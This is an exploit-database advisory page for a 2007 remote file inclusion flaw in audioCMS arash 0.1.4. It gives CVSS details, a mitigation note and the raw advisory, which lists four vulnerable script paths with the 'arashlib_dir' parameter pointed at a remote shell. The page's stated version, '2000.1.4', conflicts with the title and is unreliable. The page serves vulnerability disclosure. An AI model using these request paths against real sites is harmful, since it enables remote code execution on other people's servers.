header-logo
Suggest Exploit
vendor:
audioCMS arash
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: audioCMS arash
Affected Version From: 2000.1.4
Affected Version To: 2000.1.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

audioCMS arash 0.1.4(arashlib_dir)Remote File Inclusion Vulnerabilities

The audioCMS arash 0.1.4 is vulnerable to remote file inclusion. The vulnerability allows an attacker to include remote files by manipulating the 'arashlib_dir' parameter in various scripts. This can lead to arbitrary code execution and compromise of the affected system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of audioCMS arash or apply any available security patches. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

# audioCMS arash 0.1.4(arashlib_dir)Remote File Inclusion Vulnerabilities
# D.Script: http://sourceforge.net/projects/arash/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://Www.Tryag.Com/cc
# Exploit:[Path]/arash_lib/include/edit.inc.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/include/list_features.inc.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/class/arash_gadmin.class.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/class/arash_sadmin.class.php?arashlib_dir=Shell
# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb

# milw0rm.com [2007-04-15]

Navigation

Suggest Exploit

Services By CQR